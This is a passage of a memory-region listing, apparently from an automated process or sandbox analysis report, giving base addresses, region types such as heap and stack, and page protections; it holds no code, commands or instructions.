page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B371000
|
unkown
|
page read and write
|
||
|
1668A05F000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668BEFB000
|
unkown
|
page read and write
|
||
|
1668A3DD000
|
unkown
|
page read and write
|
||
|
1668C3E9000
|
unkown
|
page read and write
|
||
|
16687080000
|
unkown
|
page read and write
|
||
|
1668FA66000
|
unkown
|
page read and write
|
||
|
1668C367000
|
unkown
|
page read and write
|
||
|
1668AA30000
|
unkown
|
page read and write
|
||
|
1668FA62000
|
unkown
|
page read and write
|
||
|
16687F58000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
2260DFDE000
|
heap
|
page read and write
|
||
|
1668CB20000
|
unkown
|
page read and write
|
||
|
1668B0C5000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C239000
|
unkown
|
page read and write
|
||
|
43F89FE000
|
unkown
|
page readonly
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BC80000
|
unkown
|
page read and write
|
||
|
1668F8B5000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
43EF1FB000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668F0B0000
|
unkown
|
page read and write
|
||
|
1668ABAF000
|
unkown
|
page read and write
|
||
|
1668ADD8000
|
unkown
|
page read and write
|
||
|
16690815000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668FD30000
|
unkown
|
page read and write
|
||
|
1668D11A000
|
unkown
|
page read and write
|
||
|
1668C4FF000
|
unkown
|
page read and write
|
||
|
16690057000
|
unkown
|
page read and write
|
||
|
43887FC000
|
unkown
|
page read and write
|
||
|
22609691000
|
heap
|
page read and write
|
||
|
1668CD9B000
|
unkown
|
page read and write
|
||
|
1668FACB000
|
unkown
|
page read and write
|
||
|
438CFFE000
|
unkown
|
page readonly
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668AE4A000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668B8D8000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668B835000
|
unkown
|
page read and write
|
||
|
1668326E000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
16688C6A000
|
unkown
|
page read and write
|
||
|
1668A477000
|
unkown
|
page read and write
|
||
|
1668FBAC000
|
unkown
|
page read and write
|
||
|
1668D102000
|
unkown
|
page read and write
|
||
|
1668F8B1000
|
unkown
|
page read and write
|
||
|
43F11FC000
|
unkown
|
page read and write
|
||
|
1668A8A2000
|
unkown
|
page read and write
|
||
|
1668AD6E000
|
unkown
|
page read and write
|
||
|
1668F895000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668CB28000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668FB16000
|
unkown
|
page read and write
|
||
|
1668C092000
|
unkown
|
page read and write
|
||
|
16687610000
|
unkown
|
page execute and read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
53C000
|
stack
|
page read and write
|
||
|
1668F947000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
43F81FB000
|
unkown
|
page read and write
|
||
|
166840AE000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
20DC8DD0000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668E7D8000
|
unkown
|
page read and write
|
||
|
1668BF9E000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668F9E8000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668A7FF000
|
unkown
|
page read and write
|
||
|
1668C229000
|
unkown
|
page read and write
|
||
|
1668EDD4000
|
unkown
|
page read and write
|
||
|
166921E9000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A658000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668D1C5000
|
unkown
|
page read and write
|
||
|
1668A31A000
|
unkown
|
page read and write
|
||
|
1668ACB3000
|
unkown
|
page read and write
|
||
|
1668E58E000
|
unkown
|
page read and write
|
||
|
1668B952000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668C19F000
|
unkown
|
page read and write
|
||
|
1668A64F000
|
unkown
|
page read and write
|
||
|
1668BC0E000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668E576000
|
unkown
|
page read and write
|
||
|
1668B84E000
|
unkown
|
page read and write
|
||
|
1668AF36000
|
unkown
|
page read and write
|
||
|
1668DDF5000
|
unkown
|
page read and write
|
||
|
1668BF34000
|
unkown
|
page read and write
|
||
|
1668CB18000
|
unkown
|
page read and write
|
||
|
1668C320000
|
unkown
|
page read and write
|
||
|
1668FA9E000
|
unkown
|
page read and write
|
||
|
1668A28F000
|
unkown
|
page read and write
|
||
|
1668B496000
|
unkown
|
page read and write
|
||
|
1668C4EE000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668327B000
|
unkown
|
page read and write
|
||
|
226096B1000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C203000
|
unkown
|
page read and write
|
||
|
1668EB82000
|
unkown
|
page read and write
|
||
|
1668A39C000
|
unkown
|
page read and write
|
||
|
1668BF24000
|
unkown
|
page read and write
|
||
|
1668D268000
|
unkown
|
page read and write
|
||
|
1668A955000
|
unkown
|
page read and write
|
||
|
1668A9AE000
|
unkown
|
page read and write
|
||
|
1668BA77000
|
unkown
|
page read and write
|
||
|
7FF708F71000
|
unkown
|
page execute read
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668B99C000
|
unkown
|
page read and write
|
||
|
1668A32A000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
22607DC8000
|
heap
|
page read and write
|
||
|
1668A4A0000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668F704000
|
unkown
|
page read and write
|
||
|
1668BF1C000
|
unkown
|
page read and write
|
||
|
22607DC8000
|
heap
|
page read and write
|
||
|
1668B0F6000
|
unkown
|
page read and write
|
||
|
16686670000
|
unkown
|
page read and write
|
||
|
43E3995000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668FB6E000
|
unkown
|
page read and write
|
||
|
1668B022000
|
unkown
|
page read and write
|
||
|
1668D21E000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BC88000
|
unkown
|
page read and write
|
||
|
1668A680000
|
unkown
|
page read and write
|
||
|
1668AC74000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
16688B7E000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668F9B2000
|
unkown
|
page read and write
|
||
|
1668A2A8000
|
unkown
|
page read and write
|
||
|
16690AD1000
|
heap
|
page read and write
|
||
|
1668ACEC000
|
unkown
|
page read and write
|
||
|
1668AF26000
|
unkown
|
page read and write
|
||
|
1668A6A9000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
2260970E000
|
heap
|
page read and write
|
||
|
1668F77E000
|
unkown
|
page read and write
|
||
|
1668CED0000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668F0AE000
|
unkown
|
page read and write
|
||
|
16692A83000
|
heap
|
page read and write
|
||
|
1668C244000
|
unkown
|
page read and write
|
||
|
166927ED000
|
heap
|
page read and write
|
||
|
1668FA37000
|
unkown
|
page read and write
|
||
|
22607E3B000
|
heap
|
page read and write
|
||
|
1668CAD1000
|
unkown
|
page read and write
|
||
|
1668A33A000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668B60C000
|
unkown
|
page read and write
|
||
|
1668CBFC000
|
unkown
|
page read and write
|
||
|
16682760000
|
unkown
|
page read and write
|
||
|
1668FFD3000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
1668A4C1000
|
unkown
|
page read and write
|
||
|
1668CFB4000
|
unkown
|
page read and write
|
||
|
1668B45D000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
16682710000
|
unkown
|
page readonly
|
||
|
1668A7EE000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
43E399D000
|
unkown
|
page read and write
|
||
|
1668A2C8000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668BC16000
|
unkown
|
page read and write
|
||
|
1668B919000
|
unkown
|
page read and write
|
||
|
1668CCE0000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668D16B000
|
unkown
|
page read and write
|
||
|
1668AADB000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B5E3000
|
unkown
|
page read and write
|
||
|
1668BD02000
|
unkown
|
page read and write
|
||
|
1668CF09000
|
unkown
|
page read and write
|
||
|
22607DD4000
|
heap
|
page read and write
|
||
|
1668F74F000
|
unkown
|
page read and write
|
||
|
22609689000
|
heap
|
page read and write
|
||
|
1668F751000
|
unkown
|
page read and write
|
||
|
1668D0E1000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
20DCE1BF000
|
heap
|
page read and write
|
||
|
1668FB05000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668E57A000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
43EE9FE000
|
unkown
|
page readonly
|
||
|
1668AB35000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
166932B8000
|
heap
|
page read and write
|
||
|
1668A5FE000
|
unkown
|
page read and write
|
||
|
1668A4D1000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668A881000
|
unkown
|
page read and write
|
||
|
16683295000
|
heap
|
page read and write
|
||
|
1668BB3B000
|
unkown
|
page read and write
|
||
|
1668B846000
|
unkown
|
page read and write
|
||
|
1668E510000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668CC6E000
|
unkown
|
page read and write
|
||
|
1668B434000
|
unkown
|
page read and write
|
||
|
1668B85E000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BB43000
|
unkown
|
page read and write
|
||
|
1668CBDB000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668FCB8000
|
unkown
|
page read and write
|
||
|
1668B551000
|
unkown
|
page read and write
|
||
|
1668D112000
|
unkown
|
page read and write
|
||
|
43FF1FB000
|
unkown
|
page read and write
|
||
|
166821C0000
|
unkown
|
page read and write
|
||
|
1668A363000
|
unkown
|
page read and write
|
||
|
1668A660000
|
unkown
|
page read and write
|
||
|
A7A30FF000
|
stack
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668CF21000
|
unkown
|
page read and write
|
||
|
1668CAC7000
|
unkown
|
page read and write
|
||
|
1668E90C000
|
unkown
|
page read and write
|
||
|
1668B26C000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668B614000
|
unkown
|
page read and write
|
||
|
1668BE17000
|
unkown
|
page read and write
|
||
|
1668C305000
|
unkown
|
page read and write
|
||
|
1668D257000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C495000
|
unkown
|
page read and write
|
||
|
43897FD000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668AE42000
|
unkown
|
page read and write
|
||
|
1668A934000
|
unkown
|
page read and write
|
||
|
BB0000
|
trusted library allocation
|
page read and write
|
||
|
1668A637000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668CCBF000
|
unkown
|
page read and write
|
||
|
1668AE93000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A24E000
|
unkown
|
page read and write
|
||
|
1668B0D5000
|
unkown
|
page read and write
|
||
|
1668B1C1000
|
unkown
|
page read and write
|
||
|
43FB9FE000
|
unkown
|
page readonly
|
||
|
1668BA6F000
|
unkown
|
page read and write
|
||
|
1668B721000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668ABBF000
|
unkown
|
page read and write
|
||
|
1668D17C000
|
unkown
|
page read and write
|
||
|
1668D24F000
|
unkown
|
page read and write
|
||
|
1668BCFA000
|
unkown
|
page read and write
|
||
|
1668C25A000
|
unkown
|
page read and write
|
||
|
1668A850000
|
unkown
|
page read and write
|
||
|
1668E8F5000
|
unkown
|
page read and write
|
||
|
43FD9FE000
|
unkown
|
page readonly
|
||
|
98D000
|
heap
|
page read and write
|
||
|
43F41FE000
|
unkown
|
page read and write
|
||
|
1668BCB1000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668A8F3000
|
unkown
|
page read and write
|
||
|
1668A7CE000
|
unkown
|
page read and write
|
||
|
1668BAA8000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
22607DAE000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
989000
|
heap
|
page read and write
|
||
|
166871B0000
|
unkown
|
page read and write
|
||
|
7FF7C5F92000
|
unkown
|
page readonly
|
||
|
226096A3000
|
heap
|
page read and write
|
||
|
16689FF5000
|
unkown
|
page read and write
|
||
|
1668B12F000
|
unkown
|
page read and write
|
||
|
16690038000
|
unkown
|
page read and write
|
||
|
1668AB14000
|
unkown
|
page read and write
|
||
|
1668CEB8000
|
unkown
|
page read and write
|
||
|
16687930000
|
unkown
|
page read and write
|
||
|
16687950000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668CB71000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668E59F000
|
unkown
|
page read and write
|
||
|
1668C4A5000
|
unkown
|
page read and write
|
||
|
1668CF2A000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668A9A6000
|
unkown
|
page read and write
|
||
|
1668DCB8000
|
unkown
|
page read and write
|
||
|
1668B475000
|
unkown
|
page read and write
|
||
|
16690002000
|
unkown
|
page read and write
|
||
|
2260DFF6000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668AC49000
|
unkown
|
page read and write
|
||
|
438BFFE000
|
unkown
|
page readonly
|
||
|
1668AEBC000
|
unkown
|
page read and write
|
||
|
1668BE1F000
|
unkown
|
page read and write
|
||
|
1668B012000
|
unkown
|
page read and write
|
||
|
1668B88F000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668A60E000
|
unkown
|
page read and write
|
||
|
7FF70A490000
|
unkown
|
page read and write
|
||
|
1668D0B8000
|
unkown
|
page read and write
|
||
|
1668CD31000
|
unkown
|
page read and write
|
||
|
1668DCB4000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A215000
|
unkown
|
page read and write
|
||
|
1668B043000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668C550000
|
unkown
|
page read and write
|
||
|
1668FDC2000
|
unkown
|
page read and write
|
||
|
1668F8B3000
|
unkown
|
page read and write
|
||
|
1668C4CE000
|
unkown
|
page read and write
|
||
|
43EB9FE000
|
unkown
|
page readonly
|
||
|
1668CFED000
|
unkown
|
page read and write
|
||
|
1668A785000
|
unkown
|
page read and write
|
||
|
1668A975000
|
unkown
|
page read and write
|
||
|
1668B6A7000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BA3E000
|
unkown
|
page read and write
|
||
|
1668A11A000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C104000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
43EC1F9000
|
unkown
|
page read and write
|
||
|
1668CF11000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668F9DD000
|
unkown
|
page read and write
|
||
|
1668A52A000
|
unkown
|
page read and write
|
||
|
1668D206000
|
unkown
|
page read and write
|
||
|
1668AD8F000
|
unkown
|
page read and write
|
||
|
43E39BD000
|
unkown
|
page read and write
|
||
|
1668CC3D000
|
unkown
|
page read and write
|
||
|
1668C560000
|
unkown
|
page read and write
|
||
|
1668B47D000
|
unkown
|
page read and write
|
||
|
307D000
|
stack
|
page read and write
|
||
|
988000
|
heap
|
page read and write
|
||
|
1668FD79000
|
unkown
|
page read and write
|
||
|
1668A34A000
|
unkown
|
page read and write
|
||
|
1668CEF9000
|
unkown
|
page read and write
|
||
|
7FF7C6288000
|
unkown
|
page readonly
|
||
|
1668F8C6000
|
unkown
|
page read and write
|
||
|
1668C008000
|
unkown
|
page read and write
|
||
|
1668ACBB000
|
unkown
|
page read and write
|
||
|
1668A5F6000
|
unkown
|
page read and write
|
||
|
1668FFC6000
|
unkown
|
page read and write
|
||
|
1668A4C9000
|
unkown
|
page read and write
|
||
|
99A000
|
heap
|
page read and write
|
||
|
22609689000
|
heap
|
page read and write
|
||
|
16689411000
|
unkown
|
page read and write
|
||
|
16692CAD000
|
heap
|
page read and write
|
||
|
22607E27000
|
heap
|
page read and write
|
||
|
1668D247000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668CD5A000
|
unkown
|
page read and write
|
||
|
1668B053000
|
unkown
|
page read and write
|
||
|
16685990000
|
unkown
|
page read and write
|
||
|
16687520000
|
unkown
|
page read and write
|
||
|
1668B676000
|
unkown
|
page read and write
|
||
|
16683281000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
1668A067000
|
unkown
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668EE2B000
|
unkown
|
page read and write
|
||
|
1668FA1B000
|
unkown
|
page read and write
|
||
|
1668BD1B000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668CD39000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C37F000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
1668F0DB000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C272000
|
unkown
|
page read and write
|
||
|
226096AE000
|
heap
|
page read and write
|
||
|
E9171FE000
|
stack
|
page read and write
|
||
|
1668A0A0000
|
unkown
|
page read and write
|
||
|
16688AFC000
|
unkown
|
page read and write
|
||
|
1668A0C1000
|
unkown
|
page read and write
|
||
|
1668C517000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
166870F0000
|
unkown
|
page read and write
|
||
|
1668B413000
|
unkown
|
page read and write
|
||
|
1668B22B000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668FA0C000
|
unkown
|
page read and write
|
||
|
166886A0000
|
unkown
|
page read and write
|
||
|
166885E1000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
226096A5000
|
heap
|
page read and write
|
||
|
43827FD000
|
unkown
|
page read and write
|
||
|
1668AB45000
|
unkown
|
page read and write
|
||
|
1668BE60000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668CF8B000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B2FF000
|
unkown
|
page read and write
|
||
|
1668F8B7000
|
unkown
|
page read and write
|
||
|
1668CB49000
|
unkown
|
page read and write
|
||
|
1668C2D4000
|
unkown
|
page read and write
|
||
|
1668A016000
|
unkown
|
page read and write
|
||
|
1668BCF2000
|
unkown
|
page read and write
|
||
|
1668AE52000
|
unkown
|
page read and write
|
||
|
1668CD19000
|
unkown
|
page read and write
|
||
|
1668B741000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668EB9C000
|
unkown
|
page read and write
|
||
|
43E3997000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668C293000
|
unkown
|
page read and write
|
||
|
1668A287000
|
unkown
|
page read and write
|
||
|
22607DA0000
|
heap
|
page read and write
|
||
|
1668CF52000
|
unkown
|
page read and write
|
||
|
1668B825000
|
unkown
|
page read and write
|
||
|
1668DCDC000
|
unkown
|
page read and write
|
||
|
16687537000
|
unkown
|
page read and write
|
||
|
1668C474000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B42C000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668AA41000
|
unkown
|
page read and write
|
||
|
166827A3000
|
heap
|
page read and write
|
||
|
1668A2F1000
|
unkown
|
page read and write
|
||
|
1668B65D000
|
unkown
|
page read and write
|
||
|
2260DF91000
|
heap
|
page read and write
|
||
|
1668B295000
|
unkown
|
page read and write
|
||
|
1668BCC9000
|
unkown
|
page read and write
|
||
|
1668A4D9000
|
unkown
|
page read and write
|
||
|
1668F8D3000
|
unkown
|
page read and write
|
||
|
1668AA18000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668B8D0000
|
unkown
|
page read and write
|
||
|
1668B8C0000
|
unkown
|
page read and write
|
||
|
16687100000
|
unkown
|
page read and write
|
||
|
1668F8F1000
|
unkown
|
page read and write
|
||
|
1668FB9D000
|
unkown
|
page read and write
|
||
|
1668DC6A000
|
unkown
|
page read and write
|
||
|
1668BD5C000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B485000
|
unkown
|
page read and write
|
||
|
1668A79D000
|
unkown
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
1668BA46000
|
unkown
|
page read and write
|
||
|
1668B147000
|
unkown
|
page read and write
|
||
|
1668A754000
|
unkown
|
page read and write
|
||
|
1668A16C000
|
unkown
|
page read and write
|
||
|
20DCE1CC000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668FB32000
|
unkown
|
page read and write
|
||
|
22609698000
|
heap
|
page read and write
|
||
|
1668A0FA000
|
unkown
|
page read and write
|
||
|
1668B444000
|
unkown
|
page read and write
|
||
|
1668AFA0000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668DCA3000
|
unkown
|
page read and write
|
||
|
16683F50000
|
unkown
|
page read and write
|
||
|
1668ABCF000
|
unkown
|
page read and write
|
||
|
226098D0000
|
direct allocation
|
page read and write
|
||
|
1668B190000
|
unkown
|
page read and write
|
||
|
1668A46F000
|
unkown
|
page read and write
|
||
|
1668A38B000
|
unkown
|
page read and write
|
||
|
1668A81F000
|
unkown
|
page read and write
|
||
|
43F09FE000
|
unkown
|
page readonly
|
||
|
1668B528000
|
unkown
|
page read and write
|
||
|
1668ABE8000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668ADE0000
|
unkown
|
page read and write
|
||
|
1668F927000
|
unkown
|
page read and write
|
||
|
22607DC0000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
166876E0000
|
heap
|
page read and write
|
||
|
1668B43C000
|
unkown
|
page read and write
|
||
|
1668A457000
|
unkown
|
page read and write
|
||
|
1668FA0A000
|
unkown
|
page read and write
|
||
|
2260DF91000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A10A000
|
unkown
|
page read and write
|
||
|
9B2000
|
heap
|
page read and write
|
||
|
1668A5AD000
|
unkown
|
page read and write
|
||
|
1668B23B000
|
unkown
|
page read and write
|
||
|
16692B15000
|
heap
|
page read and write
|
||
|
1668BAE9000
|
unkown
|
page read and write
|
||
|
22607E3B000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BD54000
|
unkown
|
page read and write
|
||
|
1668B69F000
|
unkown
|
page read and write
|
||
|
1668C453000
|
unkown
|
page read and write
|
||
|
1668C241000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668B6BF000
|
unkown
|
page read and write
|
||
|
1668A311000
|
unkown
|
page read and write
|
||
|
16692ECC000
|
heap
|
page read and write
|
||
|
16692051000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668BE07000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668EEA8000
|
unkown
|
page read and write
|
||
|
1668B1EA000
|
unkown
|
page read and write
|
||
|
1668BFBE000
|
unkown
|
page read and write
|
||
|
166876A0000
|
heap
|
page read and write
|
||
|
1668B973000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668A74C000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
22609691000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
1668B116000
|
unkown
|
page read and write
|
||
|
22609697000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668F85B000
|
unkown
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
1668B7B3000
|
unkown
|
page read and write
|
||
|
1668FA9C000
|
unkown
|
page read and write
|
||
|
1668AA49000
|
unkown
|
page read and write
|
||
|
2260DF91000
|
heap
|
page read and write
|
||
|
1668A225000
|
unkown
|
page read and write
|
||
|
1668C0BB000
|
unkown
|
page read and write
|
||
|
1668B7A3000
|
unkown
|
page read and write
|
||
|
99C000
|
heap
|
page read and write
|
||
|
166840CF000
|
unkown
|
page read and write
|
||
|
1668F967000
|
unkown
|
page read and write
|
||
|
20DCE184000
|
heap
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
|
226096B4000
|
heap
|
page read and write
|
||
|
43E39C3000
|
unkown
|
page read and write
|
||
|
1668C082000
|
unkown
|
page read and write
|
||
|
1668CF9C000
|
unkown
|
page read and write
|
||
|
1668FDF1000
|
unkown
|
page read and write
|
||
|
16691278000
|
heap
|
page read and write
|
||
|
1668AEED000
|
unkown
|
page read and write
|
||
|
226096D3000
|
heap
|
page read and write
|
||
|
1668A3D5000
|
unkown
|
page read and write
|
||
|
226096B6000
|
heap
|
page read and write
|
||
|
226096B5000
|
heap
|
page read and write
|
||
